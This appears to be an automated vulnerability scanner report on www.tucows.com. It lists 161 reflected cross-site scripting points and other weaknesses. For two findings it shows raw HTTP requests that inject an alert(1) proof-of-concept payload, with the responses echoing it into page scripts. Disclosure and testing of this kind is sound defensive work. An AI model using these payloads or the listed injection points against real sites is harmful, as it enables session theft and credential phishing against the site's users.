www.tucows.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

XSS in www.tucows.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 09:21:47 CST 2011.



DORK CWE-79 XSS Report


1. Cross-site scripting (reflected)

1.1. http://www.tucows.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.tucows.com/about.html [REST URL parameter 1]

1.3. http://www.tucows.com/about.html [name of an arbitrarily supplied request parameter]

1.4. http://www.tucows.com/advertise.html [REST URL parameter 1]

1.5. http://www.tucows.com/advertise.html [name of an arbitrarily supplied request parameter]

1.6. http://www.tucows.com/affiliate/index.html [REST URL parameter 1]

1.7. http://www.tucows.com/affiliate/index.html [REST URL parameter 2]

1.8. http://www.tucows.com/affiliate/index.html [name of an arbitrarily supplied request parameter]

1.9. http://www.tucows.com/author_ratings.html [REST URL parameter 1]

1.10. http://www.tucows.com/author_ratings.html [name of an arbitrarily supplied request parameter]

1.11. http://www.tucows.com/contact.html [REST URL parameter 1]

1.12. http://www.tucows.com/contact.html [name of an arbitrarily supplied request parameter]

1.13. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 1]

1.14. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 2]

1.15. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 3]

1.16. http://www.tucows.com/images/newassets/contact.html [name of an arbitrarily supplied request parameter]

1.17. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 1]

1.18. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 2]

1.19. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 3]

1.20. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 4]

1.21. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 5]

1.22. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 6]

1.23. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 7]

1.24. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [name of an arbitrarily supplied request parameter]

1.25. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 1]

1.26. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 2]

1.27. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 3]

1.28. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 4]

1.29. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 5]

1.30. http://www.tucows.com/images/newassets/includes/js/aalib.js [name of an arbitrarily supplied request parameter]

1.31. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 1]

1.32. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 2]

1.33. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 3]

1.34. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 4]

1.35. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 5]

1.36. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [name of an arbitrarily supplied request parameter]

1.37. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 1]

1.38. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 2]

1.39. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 3]

1.40. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 4]

1.41. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 5]

1.42. http://www.tucows.com/images/newassets/includes/js/show_layer.js [name of an arbitrarily supplied request parameter]

1.43. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 1]

1.44. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 2]

1.45. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 3]

1.46. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 4]

1.47. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 5]

1.48. http://www.tucows.com/images/newassets/includes/js/signupin.js [name of an arbitrarily supplied request parameter]

1.49. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 1]

1.50. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 2]

1.51. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 3]

1.52. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 4]

1.53. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 5]

1.54. http://www.tucows.com/images/newassets/includes/js/x_core.js [name of an arbitrarily supplied request parameter]

1.55. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 1]

1.56. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 2]

1.57. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 3]

1.58. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 4]

1.59. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 5]

1.60. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [name of an arbitrarily supplied request parameter]

1.61. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 1]

1.62. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 2]

1.63. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 3]

1.64. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 4]

1.65. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 5]

1.66. http://www.tucows.com/images/newassets/includes/js/yetii.js [name of an arbitrarily supplied request parameter]

1.67. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 1]

1.68. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 2]

1.69. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 3]

1.70. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 4]

1.71. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 5]

1.72. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 6]

1.73. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [name of an arbitrarily supplied request parameter]

1.74. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]

1.75. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]

1.76. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]

1.77. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]

1.78. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 5]

1.79. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 6]

1.80. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [name of an arbitrarily supplied request parameter]

1.81. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 1]

1.82. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 2]

1.83. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 3]

1.84. http://www.tucows.com/images/newassets/javascript:void(null) [name of an arbitrarily supplied request parameter]

1.85. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 1]

1.86. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 2]

1.87. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 3]

1.88. http://www.tucows.com/images/newassets/lostpass.html [name of an arbitrarily supplied request parameter]

1.89. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 1]

1.90. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 2]

1.91. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 3]

1.92. http://www.tucows.com/images/newassets/privacy.html [name of an arbitrarily supplied request parameter]

1.93. http://www.tucows.com/images/newassets/safesearchtoggle.html [REST URL parameter 1]

1.94. http://www.tucows.com/images/newassets/safesearchtoggle.html [REST URL parameter 2]

1.95. http://www.tucows.com/images/newassets/safesearchtoggle.html [REST URL parameter 3]

1.96. http://www.tucows.com/images/newassets/safesearchtoggle.html [name of an arbitrarily supplied request parameter]

1.97. http://www.tucows.com/images/newassets/search.html [REST URL parameter 1]

1.98. http://www.tucows.com/images/newassets/search.html [REST URL parameter 2]

1.99. http://www.tucows.com/images/newassets/search.html [REST URL parameter 3]

1.100. http://www.tucows.com/images/newassets/search.html [name of an arbitrarily supplied request parameter]

1.101. http://www.tucows.com/images/newassets/sitemap.html [REST URL parameter 1]

1.102. http://www.tucows.com/images/newassets/sitemap.html [REST URL parameter 2]

1.103. http://www.tucows.com/images/newassets/sitemap.html [REST URL parameter 3]

1.104. http://www.tucows.com/images/newassets/sitemap.html [name of an arbitrarily supplied request parameter]

1.105. http://www.tucows.com/images/newassets/terms.html [REST URL parameter 1]

1.106. http://www.tucows.com/images/newassets/terms.html [REST URL parameter 2]

1.107. http://www.tucows.com/images/newassets/terms.html [REST URL parameter 3]

1.108. http://www.tucows.com/images/newassets/terms.html [name of an arbitrarily supplied request parameter]

1.109. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 1]

1.110. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 2]

1.111. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 3]

1.112. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 4]

1.113. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 5]

1.114. http://www.tucows.com/includes/js/aalib.js [REST URL parameter 1]

1.115. http://www.tucows.com/includes/js/aalib.js [REST URL parameter 2]

1.116. http://www.tucows.com/includes/js/aalib.js [REST URL parameter 3]

1.117. http://www.tucows.com/includes/js/ajaxlib.js [REST URL parameter 1]

1.118. http://www.tucows.com/includes/js/ajaxlib.js [REST URL parameter 2]

1.119. http://www.tucows.com/includes/js/ajaxlib.js [REST URL parameter 3]

1.120. http://www.tucows.com/includes/js/show_layer.js [REST URL parameter 1]

1.121. http://www.tucows.com/includes/js/show_layer.js [REST URL parameter 2]

1.122. http://www.tucows.com/includes/js/show_layer.js [REST URL parameter 3]

1.123. http://www.tucows.com/includes/js/signupin.js [REST URL parameter 1]

1.124. http://www.tucows.com/includes/js/signupin.js [REST URL parameter 2]

1.125. http://www.tucows.com/includes/js/signupin.js [REST URL parameter 3]

1.126. http://www.tucows.com/includes/js/x_core.js [REST URL parameter 1]

1.127. http://www.tucows.com/includes/js/x_core.js [REST URL parameter 2]

1.128. http://www.tucows.com/includes/js/x_core.js [REST URL parameter 3]

1.129. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 1]

1.130. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 2]

1.131. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 3]

1.132. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 1]

1.133. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 2]

1.134. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 3]

1.135. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 1]

1.136. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 2]

1.137. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 3]

1.138. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 4]

1.139. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]

1.140. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]

1.141. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]

1.142. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]

1.143. http://www.tucows.com/index.html [REST URL parameter 1]

1.144. http://www.tucows.com/index.html [name of an arbitrarily supplied request parameter]

1.145. http://www.tucows.com/preview/194850/x22 [REST URL parameter 1]

1.146. http://www.tucows.com/preview/194850/x22 [REST URL parameter 2]

1.147. http://www.tucows.com/preview/194850/x22 [REST URL parameter 3]

1.148. http://www.tucows.com/preview/194850/x22 [REST URL parameter 3]

1.149. http://www.tucows.com/preview/194850/x22 [name of an arbitrarily supplied request parameter]

1.150. http://www.tucows.com/privacy.html [REST URL parameter 1]

1.151. http://www.tucows.com/privacy.html [name of an arbitrarily supplied request parameter]

1.152. http://www.tucows.com/sitemap.html [REST URL parameter 1]

1.153. http://www.tucows.com/sitemap.html [name of an arbitrarily supplied request parameter]

1.154. http://www.tucows.com/software.html [REST URL parameter 1]

1.155. http://www.tucows.com/software.html [name of an arbitrarily supplied request parameter]

1.156. http://www.tucows.com/software.html [pf parameter]

1.157. http://www.tucows.com/software.html [t parameter]

1.158. http://www.tucows.com/terms.html [REST URL parameter 1]

1.159. http://www.tucows.com/terms.html [name of an arbitrarily supplied request parameter]

1.160. http://www.tucows.com/videoegg/ad.html [REST URL parameter 1]

1.161. http://www.tucows.com/videoegg/ad.html [REST URL parameter 2]

2. Cleartext submission of password

2.1. http://www.tucows.com/

2.2. http://www.tucows.com/

2.3. http://www.tucows.com/about.html

2.4. http://www.tucows.com/about.html

2.5. http://www.tucows.com/advertise.html

2.6. http://www.tucows.com/advertise.html

2.7. http://www.tucows.com/affiliate/index.html

2.8. http://www.tucows.com/affiliate/index.html

2.9. http://www.tucows.com/author_ratings.html

2.10. http://www.tucows.com/author_ratings.html

2.11. http://www.tucows.com/contact.html

2.12. http://www.tucows.com/contact.html

2.13. http://www.tucows.com/images/newassets/contact.html

2.14. http://www.tucows.com/images/newassets/contact.html

2.15. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

2.16. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

2.17. http://www.tucows.com/images/newassets/includes/js/aalib.js

2.18. http://www.tucows.com/images/newassets/includes/js/aalib.js

2.19. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

2.20. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

2.21. http://www.tucows.com/images/newassets/includes/js/show_layer.js

2.22. http://www.tucows.com/images/newassets/includes/js/show_layer.js

2.23. http://www.tucows.com/images/newassets/includes/js/signupin.js

2.24. http://www.tucows.com/images/newassets/includes/js/signupin.js

2.25. http://www.tucows.com/images/newassets/includes/js/x_core.js

2.26. http://www.tucows.com/images/newassets/includes/js/x_core.js

2.27. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

2.28. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

2.29. http://www.tucows.com/images/newassets/includes/js/yetii.js

2.30. http://www.tucows.com/images/newassets/includes/js/yetii.js

2.31. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

2.32. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

2.33. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

2.34. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

2.35. http://www.tucows.com/images/newassets/javascript:void(null)

2.36. http://www.tucows.com/images/newassets/javascript:void(null)

2.37. http://www.tucows.com/images/newassets/lostpass.html

2.38. http://www.tucows.com/images/newassets/lostpass.html

2.39. http://www.tucows.com/images/newassets/privacy.html

2.40. http://www.tucows.com/images/newassets/privacy.html

2.41. http://www.tucows.com/images/newassets/safesearchtoggle.html

2.42. http://www.tucows.com/images/newassets/safesearchtoggle.html

2.43. http://www.tucows.com/images/newassets/search.html

2.44. http://www.tucows.com/images/newassets/search.html

2.45. http://www.tucows.com/images/newassets/sitemap.html

2.46. http://www.tucows.com/images/newassets/sitemap.html

2.47. http://www.tucows.com/images/newassets/terms.html

2.48. http://www.tucows.com/images/newassets/terms.html

2.49. http://www.tucows.com/images/newassets/warningcow200.png

2.50. http://www.tucows.com/images/newassets/warningcow200.png

2.51. http://www.tucows.com/index.html

2.52. http://www.tucows.com/index.html

2.53. http://www.tucows.com/preview/194850/x22

2.54. http://www.tucows.com/preview/194850/x22

2.55. http://www.tucows.com/privacy.html

2.56. http://www.tucows.com/privacy.html

2.57. http://www.tucows.com/sitemap.html

2.58. http://www.tucows.com/sitemap.html

2.59. http://www.tucows.com/software.html

2.60. http://www.tucows.com/software.html

2.61. http://www.tucows.com/terms.html

2.62. http://www.tucows.com/terms.html

3. Cookie without HttpOnly flag set

3.1. http://www.tucows.com/preview/194850/x22

3.2. http://www.tucows.com/

3.3. http://www.tucows.com/about.html

3.4. http://www.tucows.com/advertise.html

3.5. http://www.tucows.com/affiliate/index.html

3.6. http://www.tucows.com/author_ratings.html

3.7. http://www.tucows.com/contact.html

3.8. http://www.tucows.com/images/newassets/contact.html

3.9. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

3.10. http://www.tucows.com/images/newassets/includes/js/aalib.js

3.11. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

3.12. http://www.tucows.com/images/newassets/includes/js/show_layer.js

3.13. http://www.tucows.com/images/newassets/includes/js/signupin.js

3.14. http://www.tucows.com/images/newassets/includes/js/x_core.js

3.15. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

3.16. http://www.tucows.com/images/newassets/includes/js/yetii.js

3.17. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

3.18. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

3.19. http://www.tucows.com/images/newassets/javascript:void(null)

3.20. http://www.tucows.com/images/newassets/lostpass.html

3.21. http://www.tucows.com/images/newassets/privacy.html

3.22. http://www.tucows.com/images/newassets/safesearchtoggle.html

3.23. http://www.tucows.com/images/newassets/search.html

3.24. http://www.tucows.com/images/newassets/sitemap.html

3.25. http://www.tucows.com/images/newassets/terms.html

3.26. http://www.tucows.com/images/newassets/warningcow200.png

3.27. http://www.tucows.com/index.html

3.28. http://www.tucows.com/preview/194850/x22

3.29. http://www.tucows.com/privacy.html

3.30. http://www.tucows.com/sitemap.html

3.31. http://www.tucows.com/software.html

3.32. http://www.tucows.com/terms.html

4. Password field with autocomplete enabled

4.1. http://www.tucows.com/

4.2. http://www.tucows.com/

4.3. http://www.tucows.com/about.html

4.4. http://www.tucows.com/about.html

4.5. http://www.tucows.com/advertise.html

4.6. http://www.tucows.com/advertise.html

4.7. http://www.tucows.com/affiliate/index.html

4.8. http://www.tucows.com/affiliate/index.html

4.9. http://www.tucows.com/author_ratings.html

4.10. http://www.tucows.com/author_ratings.html

4.11. http://www.tucows.com/contact.html

4.12. http://www.tucows.com/contact.html

4.13. http://www.tucows.com/images/newassets/contact.html

4.14. http://www.tucows.com/images/newassets/contact.html

4.15. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

4.16. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

4.17. http://www.tucows.com/images/newassets/includes/js/aalib.js

4.18. http://www.tucows.com/images/newassets/includes/js/aalib.js

4.19. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

4.20. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

4.21. http://www.tucows.com/images/newassets/includes/js/show_layer.js

4.22. http://www.tucows.com/images/newassets/includes/js/show_layer.js

4.23. http://www.tucows.com/images/newassets/includes/js/signupin.js

4.24. http://www.tucows.com/images/newassets/includes/js/signupin.js

4.25. http://www.tucows.com/images/newassets/includes/js/x_core.js

4.26. http://www.tucows.com/images/newassets/includes/js/x_core.js

4.27. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

4.28. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

4.29. http://www.tucows.com/images/newassets/includes/js/yetii.js

4.30. http://www.tucows.com/images/newassets/includes/js/yetii.js

4.31. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

4.32. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

4.33. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

4.34. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

4.35. http://www.tucows.com/images/newassets/javascript:void(null)

4.36. http://www.tucows.com/images/newassets/javascript:void(null)

4.37. http://www.tucows.com/images/newassets/lostpass.html

4.38. http://www.tucows.com/images/newassets/lostpass.html

4.39. http://www.tucows.com/images/newassets/privacy.html

4.40. http://www.tucows.com/images/newassets/privacy.html

4.41. http://www.tucows.com/images/newassets/safesearchtoggle.html

4.42. http://www.tucows.com/images/newassets/safesearchtoggle.html

4.43. http://www.tucows.com/images/newassets/search.html

4.44. http://www.tucows.com/images/newassets/search.html

4.45. http://www.tucows.com/images/newassets/sitemap.html

4.46. http://www.tucows.com/images/newassets/sitemap.html

4.47. http://www.tucows.com/images/newassets/terms.html

4.48. http://www.tucows.com/images/newassets/terms.html

4.49. http://www.tucows.com/images/newassets/warningcow200.png

4.50. http://www.tucows.com/images/newassets/warningcow200.png

4.51. http://www.tucows.com/index.html

4.52. http://www.tucows.com/index.html

4.53. http://www.tucows.com/preview/194850/x22

4.54. http://www.tucows.com/preview/194850/x22

4.55. http://www.tucows.com/privacy.html

4.56. http://www.tucows.com/privacy.html

4.57. http://www.tucows.com/sitemap.html

4.58. http://www.tucows.com/sitemap.html

4.59. http://www.tucows.com/software.html

4.60. http://www.tucows.com/software.html

4.61. http://www.tucows.com/terms.html

4.62. http://www.tucows.com/terms.html

5. Source code disclosure

6. Cross-domain Referer leakage

7. Cross-domain script include

7.1. http://www.tucows.com/

7.2. http://www.tucows.com/about.html

7.3. http://www.tucows.com/advertise.html

7.4. http://www.tucows.com/affiliate/index.html

7.5. http://www.tucows.com/author_ratings.html

7.6. http://www.tucows.com/contact.html

7.7. http://www.tucows.com/images/newassets/contact.html

7.8. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

7.9. http://www.tucows.com/images/newassets/includes/js/aalib.js

7.10. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

7.11. http://www.tucows.com/images/newassets/includes/js/show_layer.js

7.12. http://www.tucows.com/images/newassets/includes/js/signupin.js

7.13. http://www.tucows.com/images/newassets/includes/js/x_core.js

7.14. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

7.15. http://www.tucows.com/images/newassets/includes/js/yetii.js

7.16. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

7.17. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

7.18. http://www.tucows.com/images/newassets/javascript:void(null)

7.19. http://www.tucows.com/images/newassets/lostpass.html

7.20. http://www.tucows.com/images/newassets/privacy.html

7.21. http://www.tucows.com/images/newassets/safesearchtoggle.html

7.22. http://www.tucows.com/images/newassets/search.html

7.23. http://www.tucows.com/images/newassets/sitemap.html

7.24. http://www.tucows.com/images/newassets/terms.html

7.25. http://www.tucows.com/images/newassets/warningcow200.png

7.26. http://www.tucows.com/index.html

7.27. http://www.tucows.com/preview/194850/x22

7.28. http://www.tucows.com/privacy.html

7.29. http://www.tucows.com/sitemap.html

7.30. http://www.tucows.com/software.html

7.31. http://www.tucows.com/terms.html

8. Email addresses disclosed

8.1. http://www.tucows.com/advertise.html

8.2. http://www.tucows.com/affiliate/index.html

8.3. http://www.tucows.com/contact.html

9. HTML does not specify charset



1. Cross-site scripting (reflected)
There are 161 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.tucows.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2e8a"-alert(1)-"2f831598e8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?e2e8a"-alert(1)-"2f831598e8d=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/?e2e8a"-alert(1)-"2f831598e8d=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.2. http://www.tucows.com/about.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f530"-alert(1)-"6001743e8c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about.html8f530"-alert(1)-"6001743e8c7 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
